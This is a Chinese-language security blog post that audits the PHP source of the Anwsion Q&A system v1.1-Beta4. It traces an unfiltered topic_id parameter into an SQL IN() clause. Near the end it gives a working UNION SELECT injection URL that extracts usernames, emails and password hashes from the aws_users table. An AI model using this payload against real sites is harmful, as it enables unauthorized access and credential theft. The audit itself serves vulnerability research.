您的位置 » 首页 » 代码审计,实用工具 » Anwsion问答系统 v1.1-Beta4 注入漏洞源码实例分析

Anwsion问答系统 v1.1-Beta4 注入漏洞源码实例分析

发表于4年前 | 作者: seay | 分类: 代码审计, 实用工具 | 孵化于:2012年10月28日 | 文章热度:5,060 次 全屏阅读

显示不全请点击全屏阅读

因为耶稣的3hack是用的此程序, 答应了帮忙读读的, 但是限于一直没时间, 正好昨晚有时间就马上粗略的看了下

代码写的很规范, 对于我这种半路出家的人来说看着有点吃力, 尤其是对url参数的各种处理和分割, 很像国外程序的写法.. 看着很蛋疼!!
但是相较于我以前看的Typecho和TextCUBE等就要简单许多了 那俩活爹写法更扯淡 o(∩_∩)o ~
好了不废话了, 上代码: \app\home\main.php(85):
 
public function explore_action()
{
// 省略……….. By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
if ($_GET[‘category’])
{
if (is_numeric($_GET[‘category’])) //据说以前这里也可以注射 所以被isnum了..
{
$category_info = $this->model(‘system’)->get_category_info($_GET[‘category’]);
}
/*
省略……
*/
// 注射开始! By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
if (TPL::is_output(‘block/content_question.tpl.htm’, ‘home/explore’))
{
if (! $_GET[‘sort_type’])
{
$_GET[‘sort_type’] = ‘new’;
}
 
if ($_GET[‘sort_type’] == ‘unresponsive’)
{
$_GET[‘answer_count’] = ‘0’;
}
$question_list = $this->model(‘question’)->get_questions_list($_GET[‘page’], get_setting(‘contents_per_page’), $_GET[‘sort_type’], $_GET[‘topic_id’], $this->user_id, $category_info[‘id’], $_GET[‘answer_count’], $_GET[‘day’]);
//$_GET[‘topic_id’]直接带入了 fvck.fvck! By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
TPL::assign(‘question_list’, $question_list);
TPL::assign(‘question_list_bit’, TPL::output(‘question/ajax/list’, false));
// 省略…. 
 
继续追$this->model(‘question’)->get_questions_list函数, \models\question.php(63):
 
 
public function get_questions_list($page = 1, $pre_page = 10, $sort = ‘hot’, $topic_id = 0, $uid = null, $category_id = null, $answer_count = null, $day = 30)
{
$uid = intval($uid);
 
$user_id_list = array();
 
$user_info_list = array();
$user_list = array();
$question_info_list = array();
$question_list = array();
$limit = calc_page_limit($page, $pre_page);
 
if ($sort == ‘hot’)
{
$question_info_list = $this->get_hot_question($category_id, $topic_id, $limit, $day);
//继续带入$topic_id By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
}
//省略…… By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
再追get_hot_question函数, \models\question.php(216):
 
?View Code PHP
public function get_hot_question($category_id = 0, $topic_id = null, $limit = ‘0, 10’, $day = 30)
{
$day = intval($day);
 
if (!$day)
{
$add_time = ‘0’;
}
else if ($day == 1)
{
$add_time = strtotime(‘-1 day’);
}
else
{
$add_time = strtotime(‘-‘ . $day . ‘day’);
}
 
if ($category_id)
{
$question_all = $this->fetch_all(‘question’, “add_time > ” . $add_time . ” AND focus_count > 0 AND agree_count > 0 AND answer_count > 0 AND category_id IN(” . implode(‘,’, $this->model(‘system’)->get_category_with_child_ids(‘question’, $category_id)) . ‘)’);
 
}
else if ($topic_id)// 开始了
{
$topic_ids = array();
 
if (is_array($topic_id))
{
$topic_ids = $topic_id;
}
else
{
$topic_ids[] = $topic_id;
}
//无任何过滤 又带入了get_question_ids_by_topics_ids函数 By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
if ($question_ids = $this->model(‘topic’)->get_question_ids_by_topics_ids($topic_ids, 10, null, ‘question_id DESC’))
{
$question_all = $this->fetch_all(‘question’, “add_time > ” . $add_time . ” AND question_id IN(” . implode(‘,’, $question_ids) . ‘)’, ‘popular_value DESC’, $limit);
}
}
else
{
$question_all = $this->fetch_all(‘question’, ‘add_time > ‘ . $add_time, ‘popular_value DESC’, $limit);
}
 
return $question_all;
}
最终在get_question_ids_by_topics_ids函数进入数据库了 o(∩_∩)o~~ \models\topic.php(693):
 
?View Code PHP
function get_question_ids_by_topics_ids($topic_ids, $limit, $where = null, $order = ‘update_time DESC’)
{
 
if (!is_array($topic_ids))
{
$topic_id_in = $topic_ids;
}
else
{
$topic_id_in = implode(‘,’, $topic_ids);
}
if ($where)
{
$where = ‘ AND ‘ . $where;
}
 
$_order = explode(‘ ‘, $order);
 
if (!$where AND $_order[0] == ‘question_id’)
{
$result = $this->query_all(“SELECT question_id FROM ” . $this->get_table(‘topic_question’) . ” WHERE topic_id IN (” . $topic_id_in . “) ORDER BY ” . $order, $limit);
// 直接入库执行了, 注射产生~~ By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
}
else
{ //省略….
先丢个exp吧:
 
http://www.2cto.com /?/home/explore/category?sort_type-hot__answer_count-1__day-1__topic_id-55)%20and%201=2%20union%20select%20concat%28(select%20concat(user_name,0x2D3E,email,0x2D3E,password)%20from%20aws_users%20limit%200,1)%29%23

这程序我看很多人都是直接黑盒的, 可能大黑客们都嫌麻烦吧, 类似的注射还有, 就不多发了, 此程序极其不安全, 外强中干! over~

Tags:

Anwsion漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1552/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)